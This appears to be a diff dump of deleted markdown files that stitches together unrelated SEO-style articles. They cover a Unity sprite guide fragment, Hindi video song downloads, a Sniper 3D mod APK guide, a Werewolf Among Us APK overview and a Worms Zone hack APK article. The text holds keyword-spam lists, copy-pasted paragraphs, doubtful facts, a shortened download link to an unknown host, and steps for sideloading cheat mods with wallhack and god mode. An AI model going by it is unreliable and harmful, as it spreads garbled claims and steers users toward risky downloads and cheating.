    To create tilemaps with 2D tilemap package, you need to install the package from the Package Manager. Then, you can create a Tilemap game object, which is a game object that has a Tilemap component and a Tilemap Renderer component attached to it. You can also create a Tile Palette, which is a window that lets you paint tiles on your tilemap. To create tiles, you can use the Tile Asset, which is an asset that defines and stores information about a particular type of tile. You can also use the Rule Tile Asset, which is an asset that defines rules for how tiles behave based on their neighbors.

    How can I edit sprites in the Sprite Editor?

    To edit sprites in the Sprite Editor, select your sprite in the Assets window and click on the Edit button in the Inspector window. This will open the Sprite Editor window, where you can edit various properties of your sprite. Some of the things you can do in the Sprite Editor are:

    • Slice your sprite into multiple sub-sprites.
    • Apply 9-slicing to your sprite.
    • Create custom physics shapes for your sprite.
    • Create secondary textures for your sprite.
    • Create custom pivot points for your sprite.

    How can I create custom shapes with Sprite Shape Renderer?


    To create custom shapes with Sprite Shape Renderer, you need to create a Sprite Shape Profile and assign sprites to it. Then, you need to create a Sprite Shape game object and edit its spline path in the scene. You can also adjust some settings in the Sprite Shape Renderer component, such as fill texture, color, material, etc. You can also use scripts to modify your shape at runtime.
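
    As a rough illustration of runtime modification, the Unity C# sketch below wobbles a shape's control points with a sine wave. It assumes the script sits on the same game object as the SpriteShapeController; the amplitude and speed values are arbitrary examples:

    ```csharp
    using UnityEngine;
    using UnityEngine.U2D;

    // Attach to a Sprite Shape game object to gently animate its spline.
    public class ShapeWobble : MonoBehaviour
    {
        void Update()
        {
            Spline spline = GetComponent<SpriteShapeController>().spline;

            // Raise and lower every control point with a phase-shifted sine.
            for (int i = 0; i < spline.GetPointCount(); i++)
            {
                Vector3 p = spline.GetPosition(i);
                p.y += Mathf.Sin(Time.time + i) * 0.01f;
                spline.SetPosition(i, p);
            }
        }
    }
    ```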

    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md b/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md deleted file mode 100644 index 3da194e4912b8ee2a46b0d3237a682daa1498180..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md +++ /dev/null @@ -1,122 +0,0 @@ - -

    Hindi Video Songs Download 2020: How to Enjoy the Latest Bollywood Hits

    Introduction

    If you are a fan of Hindi music, you must be looking for the best ways to download and enjoy the latest Hindi video songs of 2020. Hindi video songs are not only catchy and melodious, but also showcase the rich culture and diversity of India. Whether you want to groove to the beats of a dance number, feel the emotions of a romantic song, or get inspired by a patriotic song, there is something for everyone in Hindi video songs.

    But how can you download and watch the latest Hindi video songs of 2020? What are the best sources to find them? How can you make sure that you are getting high-quality videos and not pirated ones? In this article, we will answer all these questions and more. We will also give you some tips on how to enjoy the latest Bollywood hits to the fullest.

    Why Download Hindi Video Songs?

    There are many reasons why you might want to download Hindi video songs instead of streaming them online. Some of them are:
    • You can watch them offline anytime and anywhere, without worrying about internet connectivity or data charges.
    • You can save them on your device or external storage and create your own playlist of your favorite songs.
    • You can share them with your friends and family via Bluetooth, WhatsApp, or other apps.
    • You can watch them on a bigger screen, such as your TV or laptop, for a better viewing experience.
    • You can avoid annoying ads and pop-ups that interrupt your streaming.

    How to Download Hindi Video Songs?

    There are many ways to download Hindi video songs, but not all of them are legal and safe. Some websites and apps may offer free downloads, but they may also contain viruses, malware, or spyware that can harm your device or compromise your privacy. Some may also violate the copyright laws and infringe on the rights of the artists and producers.


    Therefore, it is important to download Hindi video songs from reliable and authorized sources that respect the law and the creators. Here are some of the best options to download Hindi video songs legally and safely:

    JioSaavn

    JioSaavn is one of the most popular music streaming platforms in India, offering over 55 million songs in various languages, genres, and moods. You can also download Hindi video songs from JioSaavn by subscribing to their Pro plan, which costs Rs. 99 per month or Rs. 399 per year. With JioSaavn Pro, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from JioSaavn Originals.

    To download Hindi video songs from JioSaavn, you need to install the app on your Android or iOS device and sign up for a Pro account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    Wynk Music

    Wynk Music is another popular music streaming platform in India, offering over 6 million songs in various languages, genres, and moods. You can also download Hindi video songs from Wynk Music by subscribing to their Premium plan, which costs Rs. 99 per month or Rs. 399 per year. With Wynk Premium, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from Wynk Originals.

    To download Hindi video songs from Wynk Music, you need to install the app on your Android or iOS device and sign up for a Premium account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    Songdew

    Songdew is a unique music platform that connects independent artists and music lovers. You can also download Hindi video songs from Songdew by subscribing to their Plus plan, which costs Rs. 99 per month or Rs. 999 per year. With Songdew Plus, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from Songdew Originals.

    To download Hindi video songs from Songdew, you need to install the app on your Android or iOS device and sign up for a Plus account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    YouTube

    YouTube is the most popular video-sharing platform in the world, offering billions of videos in various languages, genres, and moods. You can also download Hindi video songs from YouTube by using a third-party app or website that converts YouTube videos into MP3 or MP4 files. However, this method is neither legal nor safe, as it violates the terms of service of YouTube and may expose you to viruses, malware, or spyware. Moreover, the quality of the downloaded videos may not be optimal and you may not get the full lyrics or subtitles.

    To download Hindi video songs from YouTube legally and safely, you need to subscribe to YouTube Premium, which costs Rs. 129 per month or Rs. 399 per quarter. With YouTube Premium, you can download unlimited videos in high quality (up to 1080p) and enjoy them offline without ads. You can also access exclusive content and podcasts from YouTube Originals.

    To download Hindi video songs from YouTube Premium, you need to install the app on your Android or iOS device and sign up for a Premium account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your watching history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

How to Enjoy Hindi Video Songs?

Downloading Hindi video songs is not enough to enjoy them fully. You also need a good device, a good sound system, and the right mood to appreciate the beauty and charm of Hindi music. Here are some tips on how to enjoy Hindi video songs to the fullest.

Choose a Good Device

The device that you use to watch Hindi video songs should have a good display, a long battery life, and enough storage capacity. Make sure it is also compatible with the app or website that you use to download the songs. Some good devices for watching Hindi video songs are:

Samsung Galaxy S21 Ultra
- 6.8-inch Dynamic AMOLED 2X display with 120Hz refresh rate
- 5,000 mAh battery with fast charging and wireless charging
- 128GB/256GB/512GB internal storage with microSD card slot
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Apple iPhone 12 Pro Max
- 6.7-inch OLED display with 60Hz refresh rate
- 3,687 mAh battery with fast charging and wireless charging
- 128GB/256GB/512GB internal storage without microSD card slot
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

OnePlus 9 Pro
- 6.7-inch Fluid AMOLED display with 120Hz refresh rate
- 4,500 mAh battery with fast charging and wireless charging
- 128GB/256GB internal storage without microSD card slot
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Xiaomi Mi 11 Ultra
- 6.81-inch AMOLED display with 120Hz refresh rate
- 5,000 mAh battery with fast charging and wireless charging
- 256GB/512GB internal storage without microSD card slot
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Choose a Good Sound System

The sound system that you use to listen to Hindi video songs should have good sound quality, a wide volume range, and good connectivity. Make sure it is also compatible with the device that you use to watch the songs. Some good sound systems for listening to Hindi video songs are:

Bose Home Speaker 500
- Wireless smart speaker with built-in voice assistants
- Stereo sound with two custom drivers
- Touch controls and LCD display
- Wi-Fi and Bluetooth connectivity
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Sony HT-X8500 Soundbar
- Wireless soundbar with built-in subwoofer
- Dolby Atmos and DTS:X surround sound
- HDMI ARC and optical input
- Bluetooth connectivity
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

JBL Flip 5 Bluetooth Speaker
- Wireless portable speaker with IPX7 waterproof rating
- Stereo sound with dual passive radiators
- 12 hours of playtime with 4,800 mAh battery
- USB-C charging port
- Bluetooth connectivity
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Boat Stone 200 Bluetooth Speaker
- Wireless portable speaker with IPX6 water and dust resistance rating
- Mono sound with 50 mm driver
- 10 hours of playtime with 1,500 mAh battery
- Micro USB charging port
- Bluetooth connectivity
- Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps

Choose a Good Mood

The mood that you are in when you watch Hindi video songs can also affect your enjoyment of them. Choose songs that match your mood or help you change it for the better. Here are some tips on choosing songs based on your mood:

• If you are feeling happy and energetic, choose upbeat and lively songs that make you want to dance and sing along. Some examples are Badtameez Dil from Yeh Jawaani Hai Deewani, Ghungroo from War, Makhna from Drive, and Garmi from Street Dancer 3D.
• If you are feeling sad and depressed, choose soothing and emotional songs that make you feel comforted and understood. Some examples are Tum Hi Ho from Aashiqui 2, Kabira from Yeh Jawaani Hai Deewani, Tu Hi Yaar Mera from Pati Patni Aur Woh, and Tere Bina from SIMMBA.
• If you are feeling angry and frustrated, choose powerful and rebellious songs that make you feel empowered and motivated. Some examples are Zinda Hai Toh from Bhaag Milkha Bhaag, Kar Har Maidaan Fateh from Sanju, Bekhayali from Kabir Singh, and Genda Phool by Badshah.
• If you are feeling romantic and in love, choose sweet and sensual songs that make you feel closer to your partner. Some examples are Tum Se Hi from Jab We Met, Pehla Nasha from Jo Jeeta Wohi Sikandar, Tum Hi Ho Bandhu from Cocktail, and Dil Diyan Gallan from Tiger Zinda Hai.
• If you are feeling patriotic and proud, choose inspiring and uplifting songs that make you feel connected to your country. Some examples are Vande Mataram from Lagaan, Chak De India from Chak De India, Ae Watan from Raazi, and Teri Mitti from Kesari.

Conclusion

Hindi video songs are a great way to enjoy the latest Bollywood hits and experience the diversity and richness of Indian culture. To download and watch them, use reliable, authorized sources that offer high-quality videos and respect the law and the creators. You also need a good device, a good sound system, and the right mood to appreciate the beauty and charm of Hindi music. We hope this article has helped you find the best ways to download and enjoy the Hindi video songs of 2020.

FAQs

Q: What are some of the best Hindi video songs of 2020?

A: Some of the best Hindi video songs of 2020 are:

• Shayad from Love Aaj Kal
• Ghoomar from Padmaavat
• Dus Bahane 2.0 from Baaghi 3
• Muqabla from Street Dancer 3D
• Malang from Malang

Q: How can I download Hindi video songs for free?

A: Some websites and apps offer free downloads, but they may not be legal or safe, the video quality is often poor, and the full lyrics or subtitles may be missing. It is better to use paid sources that offer high-quality videos and respect the law and the creators.

Q: How can I watch Hindi video songs on my TV?

A: Use a device that supports HDMI or Chromecast. Connect your device to your TV with an HDMI cable or a Chromecast dongle and stream or play the downloaded videos. You can also use a smart TV with built-in apps for music streaming platforms.

Q: How can I learn the lyrics of Hindi video songs?

A: Use apps or websites that provide lyrics along with the videos, such as Musixmatch, Lyricsmint, Gaana, and Hungama. You can also use services that provide translations or transliterations of the lyrics in English or other languages, such as Shabdkosh and LyricsTranslate.

Q: How can I discover new Hindi video songs?

A: Use apps or websites that provide curated playlists or recommendations based on your listening history and preferences, such as JioSaavn, Wynk Music, Songdew, and YouTube Premium. You can also follow blogs or social media accounts that review or share new Hindi video songs, such as Bollywood Hungama, Filmfare, Koimoi, and MissMalini.


    Sniper 3D: How to Get Unlimited Coins and Diamonds with Mod APK

If you are a fan of shooting games, you might have heard of Sniper 3D, one of the most popular sniper games on mobile devices. In this game, you take on hundreds of thrilling missions as a professional sniper, using a variety of guns and gadgets. You can also compete with other players in real-time multiplayer modes, or join a squad and participate in team battles.

However, to enjoy the full potential of Sniper 3D, you need a lot of coins and diamonds. These in-game currencies let you buy new weapons, upgrade your equipment, unlock special items, and more. Unfortunately, earning coins and diamonds in Sniper 3D can be slow and tedious, especially if you don't want to spend real money on microtransactions.

That's why some players resort to mod APKs to get unlimited coins and diamonds. A mod APK is a modified version of the original game file, altered to give you access to features that are normally locked or restricted. By using a mod APK, you can bypass the game's limitations and enjoy unlimited resources without spending a dime.

How to Download and Install Sniper 3D Mod APK

If you want to try using a mod APK for Sniper 3D, follow these steps:

1. Find a reliable source for the mod APK file. Many websites claim to offer mod APKs for Sniper 3D, but not all of them are trustworthy; some contain malware, viruses, or outdated versions that don't work. Before downloading any file from an unknown source, check reviews, ratings, and feedback from other users to verify its quality and safety.
2. Enable unknown sources on your device. Since mod APKs do not come from the official Google Play Store, you must allow your device to install apps from unknown sources. Go to your device's settings, then Security or Privacy, and enable installation from unknown sources. The exact path varies by device model and operating system version.
3. Install the mod APK file and grant permissions. Locate the downloaded file in your device's storage or download folder, then tap on it to start the installation. You may need to grant some permissions for the app to access your device's features or data. Follow the on-screen instructions until the installation is complete.
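One basic safety check for step 1, comparing the downloaded file's checksum against one the publisher lists, can be sketched in Python. This is a minimal illustration: the filename, the placeholder bytes, and the expected digest are stand-ins, not a real APK or a real published checksum.

```python
import hashlib

def sha256_of(path: str) -> str:
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Stand-in file so the sketch is self-contained; in practice, point
# sha256_of() at the APK you actually downloaded and compare against
# the checksum published by the source you trust.
with open("downloaded.apk", "wb") as f:
    f.write(b"abc")  # placeholder bytes, not a real APK

expected = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
print("match" if sha256_of("downloaded.apk") == expected else "mismatch")
# prints: match
```

If the digests differ, the file was corrupted in transit or replaced with something else, and it should not be installed.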

How to Use Sniper 3D Mod APK

After installing the mod APK for Sniper 3D, you can start using it by following these steps:

• Access the mod menu and customize your settings. When you launch the game, you should see a mod menu icon on the screen. Tap on it to open the mod menu, where you can adjust various options, for example enabling or disabling unlimited coins and diamonds, auto-aim, wallhack, and god mode. You can also change the coin and diamond values to your desired amount; be careful not to set them too high, as this may crash the game or flag your account for cheating.
• Enjoy unlimited coins and diamonds in the game. Once you have configured the mod menu, play the game as usual. Your coins and diamonds should be unlimited or set to the amount you chose. You can spend them on new weapons, equipment upgrades, and special items, and access premium features that normally require payment or a subscription, such as VIP mode and exclusive weapons.
• Avoid bans and other risks. The game developers may detect your cheating and ban your account or device. You may also face legal issues if you violate the game's terms of service or infringe on the creators' intellectual property rights, and you may ruin the game's balance for players who play legitimately. Use the mod APK sparingly and responsibly, and avoid using it in online multiplayer modes or on leaderboards, where it is more likely to attract suspicion from other players or moderators.

Pros and Cons of Sniper 3D Mod APK

Using a mod APK for Sniper 3D has its pros and cons. Here are some of them:


Pros:
• You can save time and money by getting unlimited coins and diamonds without spending real money or grinding for hours.
• You can unlock premium features that normally require payment or a subscription, such as VIP mode and exclusive weapons.
• You can customize your gameplay with mod options such as auto-aim, wallhack, and god mode.
• You can explore parts of the game that are normally hidden or inaccessible, such as secret missions and hidden locations.

Cons:
• You may expose your device to malware, viruses, or other harmful software that can damage it or steal your personal information.
• You may violate the game's terms of service or infringe on the intellectual property rights of the game creators, which can lead to penalties or legal action.
• You may ruin the game's balance and fairness for players who play legitimately, causing frustration or resentment in the community.
• You may lose interest or challenge by making the game too easy or boring with unlimited resources or cheats.

Conclusion

In conclusion, using a mod APK for Sniper 3D can be a tempting option for players who want unlimited coins and diamonds. However, it comes with risks and drawbacks that you should weigh before downloading and installing any file from an unknown source. Personally, I would not recommend using a mod APK for Sniper 3D, as I think it takes away the fun and thrill of playing a sniper game; I prefer to play legitimately and earn my coins and diamonds through hard work and skill. If you do decide to use a mod APK, you do so at your own risk and responsibility.

If you enjoyed this article, please share it with your friends who play Sniper 3D. You can also leave a comment below and let me know what you think about using a mod APK for Sniper 3D. Do you use it or not? Why or why not? I would love to hear your opinions and feedback.

FAQs

Here are some frequently asked questions about using a mod APK for Sniper 3D:

Q: Is using a mod APK for Sniper 3D illegal?

A: Using a mod APK for Sniper 3D is not necessarily illegal in itself, but it may violate the game's terms of service or infringe on the intellectual property rights of the game creators, which can result in legal action or penalties from the developers or authorities.

Q: Is using a mod APK for Sniper 3D safe?

A: No. You may expose your device to malware, viruses, or other harmful software that can damage it or steal your personal information, and you risk getting banned or suspended if the developers detect your cheating. Always be careful and cautious when downloading and installing any file from an unknown source.

Q: How can I get coins and diamonds in Sniper 3D without using a mod APK?

A: There are several ways:

• Completing missions and challenges. The more difficult the mission or challenge, the more rewards you get.
• Watching ads and videos. You can earn free coins and diamonds this way, but it is time-consuming, as you have to watch a lot of ads to get a decent amount.
• Participating in events and tournaments. These are usually limited-time or seasonal, so check the game regularly for updates and announcements.
• Purchasing with real money through the game's store or in-app purchases. This is the fastest and easiest way, but it can be expensive and addictive.

Q: What are some alternatives to Sniper 3D mod APK?

A: If you are looking for alternatives, try these other sniper games:

• Hitman Sniper. A sniper game based on the Hitman franchise, where you play as Agent 47, a professional assassin, using various weapons, gadgets, and strategies to eliminate targets in different locations and scenarios.
• Sniper Fury. A sniper game with stunning graphics, realistic physics, and intense action. You can join a squad and fight other players in real-time multiplayer modes, or take on solo missions and challenges.
• Sniper Arena. A sniper game focused on online PvP battles against snipers from around the world, where you can customize your weapons, gear, and skills and climb the leaderboard.

Q: How can I improve my skills in Sniper 3D?

A: Follow these tips:

• Practice regularly and learn from your mistakes. Play different modes and levels to test your abilities and challenge yourself.
• Upgrade your weapons and equipment to increase their performance and efficiency, and unlock gear that suits your playstyle and preferences.
• Use the right weapon for the situation, depending on distance, accuracy, damage, and rate of fire, along with the appropriate scope, silencer, and magazine.
• Use the environment to your advantage: find cover, hiding spots, and vantage points, and use environmental objects to distract or eliminate your enemies.


    Werewolf Among Us APK: A Social Game of Deception and Survival

Do you love playing social games that test your skills of deduction, deception, and communication? Do you enjoy being part of a team that has to work together to find the impostor among them? Do you like having fun with your friends online in a game that is thrilling, challenging, and entertaining? If you answered yes to any of these questions, you might want to try Werewolf Among Us APK, a game inspired by the popular game Among Us and the classic party game Werewolf.

What is Werewolf Among Us APK?

Werewolf Among Us APK is an Android application that lets you play a game of Werewolf with other players online. Werewolf is a game in which a group of players is divided into two teams: the werewolves, who know each other and try to kill the other players, and the villagers, who do not know each other and try to find and eliminate the werewolves. Some players also have special roles that give them unique abilities or information. The game is divided into day and night phases, during which different roles can take different actions. The game ends when either all the werewolves are dead or the werewolves outnumber the villagers.

The gameplay of Werewolf Among Us APK

The gameplay of Werewolf Among Us APK is similar to the original Werewolf game, but with some differences. For example:

• The game can be played with 4 to 16 players.
• The game can be customized with different settings, such as the number of werewolves, the duration of each phase, and the voting system.
• The game can be played in different modes, such as classic mode, couple mode, or custom mode.
• The game supports several languages, including English, Chinese, and Japanese.
• The game can be played with voice chat or text chat.
• The game can be played with friends or strangers.

The features of Werewolf Among Us APK

Werewolf Among Us APK has many features that make it enjoyable and engaging:

• High-quality graphics and sound effects that create a realistic, immersive atmosphere.
• A variety of roles with different skills and functions that add complexity and diversity to the game.
• A ranking system that tracks your performance and progress.
• A social side that lets you chat with other players, make friends, join groups, and send gifts.
• Regular updates that add new features and fix bugs.

How to download and install Werewolf Among Us APK?

If you want to play Werewolf Among Us APK, you need to download and install it on your Android device. Here are the requirements and steps for doing so.

The requirements for Werewolf Among Us APK

To download and install Werewolf Among Us APK, you need:

• An Android device running Android 4.4 or higher.
• A stable internet connection.
• Enough free storage space on your device.
• Permission to install apps from unknown sources. You can enable this in your device settings under Security or Privacy by allowing installation from unknown sources.

The steps for downloading and installing Werewolf Among Us APK

To download and install Werewolf Among Us APK, follow these steps:

1. Go to the official website of Werewolf Among Us APK or another trusted source that provides the download link for the game.
2. Tap the download button and wait for the file to be downloaded to your device.
3. Locate the downloaded file on your device and tap on it to start the installation process.
4. Follow the on-screen instructions and agree to the terms and conditions of the game.
5. Wait for the installation to complete and launch the game from your app drawer or home screen.

How to play Werewolf Among Us APK?

Now that you have downloaded and installed Werewolf Among Us APK, you are ready to play it. Here are some basic rules and tips.

The roles and teams in Werewolf Among Us APK

In Werewolf Among Us APK, there are two main teams: the wolves and the villagers. The wolves are the impostors who try to kill the villagers, while the villagers are the innocent players who try to find and vote out the wolves. Each player is assigned a role at the beginning of the game, which determines their team and abilities. Some of the roles are:

• Werewolf (Wolves): A basic wolf who can kill one villager at night.
• Beta Wolf (Wolves): A wolf who can turn one villager into a wolf at night.
• Mystic Wolf (Wolves): A wolf who can check one player's role at night.
• Villager (Villagers): A basic villager with no special abilities.
• Seer (Villagers): A villager who can check one player's team at night.
• Doctor (Villagers): A villager who can heal one player at night.
• Detective (Villagers): A villager who can check one player's action at night.
• Hunter (Villagers): A villager who can kill one player when they die.
• Jester (Neutral): A neutral player who wins if they get voted out by the villagers.
• Cupid (Neutral): A neutral player who can make two players fall in love at night; if one of them dies, the other dies too.

There are more roles in the game, which you can check in the game's settings or online.
    -

    werewolf among us game download
    -werewolf among us mod apk
    -werewolf among us online multiplayer
    -werewolf among us android app
    -werewolf among us free apk
    -werewolf among us latest version
    -werewolf among us hack apk
    -werewolf among us gameplay guide
    -werewolf among us tips and tricks
    -werewolf among us best roles
    -werewolf among us review and rating
    -werewolf among us cheats and codes
    -werewolf among us strategy and tactics
    -werewolf among us how to play
    -werewolf among us fun and funny moments
    -werewolf among us characters and skins
    -werewolf among us update and patch notes
    -werewolf among us fan art and memes
    -werewolf among us discord server and community
    -werewolf among us voice chat and communication
    -werewolf among us custom maps and modes
    -werewolf among us bugs and glitches
    -werewolf among us comparison and alternatives
    -werewolf among us secrets and easter eggs
    -werewolf among us challenges and achievements
    -werewolf among us rules and settings
    -werewolf among us download for pc
    -werewolf among us emulator for windows
    -werewolf among us apk pure and safe
    -werewolf among us no ads and premium features
    -werewolf among us offline and solo mode
    -werewolf among us space theme and background
    -werewolf among us different professions and skills
    -werewolf among us random identity and team assignment
    -werewolf among us day and night cycle and real-time gameplay
    -werewolf among us villagers, werewolves, cupid, fortune teller, defender, witch, hunter, idiot roles and identities
    -werewolf among us support and feedback
    -werewolf among us installation and requirements
    -werewolf among us trailer and screenshots
    -werewolf among us genre and category

    -

The phases and actions in Werewolf Among Us APK

In Werewolf Among Us APK, the game is divided into two phases: the night phase and the day phase. During the night phase, the wolves and some villagers use their abilities to kill, investigate, heal, or manipulate other players. During the day phase, all the players discuss and vote to eliminate one player they suspect is a wolf. The game alternates between these two phases until one team wins or the game ends in a draw.
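The end-of-game rule that drives this alternation can be condensed into a small check. Below is a sketch in Python based only on the two-team rule described in this article (all wolves dead, or wolves outnumbering villagers); special and neutral roles are left out.

```python
def winner(teams):
    """teams: list of 'wolf' / 'villager' strings, one per living player."""
    wolves = teams.count("wolf")
    villagers = len(teams) - wolves
    if wolves == 0:
        return "villagers"   # all werewolves are dead
    if wolves > villagers:
        return "wolves"      # werewolves outnumber the villagers
    return None              # no winner yet: play another night and day

print(winner(["wolf", "villager", "villager"]))  # None, game continues
print(winner(["villager", "villager"]))          # villagers
print(winner(["wolf", "wolf", "villager"]))      # wolves
```

Running a check like this after every night kill and every day vote is what decides when the day/night loop stops.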

The tips and strategies for Werewolf Among Us APK

To play Werewolf Among Us APK well, you need skills and strategies that can help you win. Here are some tips:

• If you are a wolf, lie, bluff, and deceive the villagers. You can pretend to be a villager or a special role, accuse other players of being wolves, or create alibis for yourself and your teammates.
• If you are a villager, deduce, communicate, and cooperate with the other villagers. Use logic, evidence, and intuition to find the wolves, share your information and suspicions with other players, and ask the special roles for help.
• If you are a neutral player, manipulate, confuse, and trick both teams. You can act as a third party that sways the votes, create chaos and suspicion among the players, or use your abilities to achieve your own goal.
• In general, pay attention to the clues, actions, and behavior of the other players. Use voice chat or text chat to communicate, but be careful what you say and whom you trust.

    Why play Werewolf Among Us APK?

    -

    Werewolf Among Us APK is a game that can offer you many benefits and challenges. Here are some reasons why you should play the game:

    -

    The benefits of playing Werewolf Among Us APK

    -

    Playing Werewolf Among Us APK can help you:

    -
      -
    • Improve your cognitive skills, such as memory, logic, creativity, and problem-solving.
    • -
    • Enhance your social skills, such as communication, persuasion, teamwork, and leadership.
    • -
    • Have fun with your friends or make new friends online.
    • -
    • Experience different scenarios and outcomes every time you play.
    • -
    • Satisfy your curiosity and interest in mystery and horror genres.
    • -
    -

    The challenges of playing Werewolf Among Us APK

    -

    Playing Werewolf Among Us APK can also pose some challenges for you. Some of these challenges are:

    -
      -
    • You may encounter some technical issues or bugs that affect the game quality or performance.
    • -
    • You may face some difficulties or frustrations when playing with strangers or trolls who ruin the game.
    • -
    • You may feel some stress or pressure when playing as a wolf or a special role that has a lot of responsibility.
    • -
    • You may get addicted to the game and spend too much time or money on it.
    • -
    • You may get scared or disturbed by some of the graphics or sound effects of the game.
    • -
    -

    Conclusion

    -

    Werewolf Among Us APK is a social game of deception and survival inspired by Among Us and Werewolf. It tests your deduction, deception, and communication skills while you have fun with other players online, and its many features, roles, modes, and settings keep it diverse and engaging. It offers benefits and challenges that can sharpen your cognitive and social skills while satisfying your interest in mystery and horror. If you are looking for a game that is thrilling, challenging, and entertaining, you should try Werewolf Among Us APK.

    -

    FAQs

    -

    Here are some frequently asked questions about Werewolf Among Us APK:

    -

    Q: Is Werewolf Among Us APK free?

    -

    A: Yes, Werewolf Among Us APK is free to download and play. However, it may contain in-app purchases that cost real money, as well as ads.

    -

    Q: Is Werewolf Among Us APK safe?

    -

    A: Yes, Werewolf Among Us APK is safe to use as long as you download it from a trusted source and scan it for viruses or malware. However, you should be careful about what information you share with other players and what permissions you grant to the app.

    -

    Q: How can I play Werewolf Among Us APK with my friends?

    -

    A: You can play Werewolf Among Us APK with your friends by creating a private room and inviting them to join. You can also join a public room and invite your friends to the same room. You can use voice chat or text chat to communicate with your friends during the game.

    -

    Q: What are some of the best roles in Werewolf Among Us APK?

    -

    A: The best roles in Werewolf Among Us APK depend on your preference and play style. Some of the most popular and powerful roles are:

    -
      -
    • Werewolf: A wolf who can kill one villager at night and deceive the others during the day.
    • -
    • Seer: A villager who can check one player's team at night and reveal the wolves to the others.
    • -
    • Jester: A neutral player who wins if they get voted out by the villagers and can cause chaos and confusion among the players.
    • -
    • Cupid: A neutral player who can make two players fall in love at night and influence their votes and actions.
    • -
    -

    Q: How can I win Werewolf Among Us APK?

    -

    A: To win Werewolf Among Us APK, you need to follow the objective of your role and team. If you are a wolf, you need to kill all the villagers or outnumber them. If you are a villager, you need to find and vote out all the wolves. If you are a neutral player, you need to achieve your specific goal, such as getting voted out or making your lovers survive.

    -

    Q: Where can I find more information about Werewolf Among Us APK?

    -

    A: You can find more information about Werewolf Among Us APK on the official website of the game, the online forums or communities of the game, or the online reviews or guides of the game.

    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md b/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md deleted file mode 100644 index de6f89e9b22dd386eebdc67edba9c32883674ff4..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md +++ /dev/null @@ -1,96 +0,0 @@ - -

    Worms Zone .io - Hungry Snake Hack APK: How to Download and Play

    -

    Do you love slithering, eating, and growing in a fun and addictive snake game? If yes, then you might want to try Worms Zone .io - Hungry Snake, a popular online multiplayer game where you can compete with other players from around the world. But what if you want to get unlimited money, skins, and power-ups in the game? Well, you can do that by downloading and installing Worms Zone .io - Hungry Snake Hack APK, a modified version of the original game that gives you access to all the features and resources for free. In this article, we will tell you what Worms Zone .io - Hungry Snake is, what Worms Zone .io - Hungry Snake Hack APK is, and how to download and play it on your Android device.

    -

    What is Worms Zone .io - Hungry Snake?

    -

    Worms Zone .io - Hungry Snake is a casual arcade game developed by CASUAL AZUR GAMES. It is inspired by the classic snake game, but with a twist. In this game, you control a worm that can grow bigger and longer by eating food and other worms on the map. You can also customize your worm with different skins, outfits, and accessories. The game has various modes, such as Classic, Turbo, and Battle Royale, where you can challenge yourself and other players. The game also has leaderboards, achievements, and daily missions to keep you engaged.

    -

    worms zone io hungry snake hack apk


    Download File ✶✶✶ https://urlca.com/2uOflp



    -

    Features of Worms Zone .io - Hungry Snake

    -
      -
    • Simple and intuitive controls: You can control your worm by swiping on the screen or using a virtual joystick.
    • -
    • Colorful and vibrant graphics: The game has a bright and cheerful design that appeals to players of all ages.
    • -
    • Fun and addictive gameplay: The game is easy to play but hard to master. You have to avoid crashing into other worms or the walls while eating as much as you can.
    • -
    • Various modes and maps: The game has different modes and maps to suit your preferences and skills. You can play in Classic mode, where you have to survive as long as possible; Turbo mode, where you have to move faster and eat more; or Battle Royale mode, where you have to be the last worm standing.
    • -
    • Customization options: You can personalize your worm with hundreds of skins, outfits, and accessories. You can also unlock new items by completing missions or using coins.
    • -
    • Social features: You can play with your friends or other players from around the world. You can also chat with them, send emojis, and join clans.
    • -
    -

    How to play Worms Zone .io - Hungry Snake

    -
      -
    1. Download and install the game from Google Play Store or App Store.
    2. -
    3. Launch the game and choose your mode and map.
    4. -
    5. Select your worm skin and outfit.
    6. -
    7. Swipe on the screen or use the joystick to move your worm.
    8. -
    9. Eat food and other worms to grow bigger and longer.
    10. -
    11. Avoid crashing into other worms or the walls.
    12. -
    13. Use power-ups to boost your speed, size, or vision.
    14. -
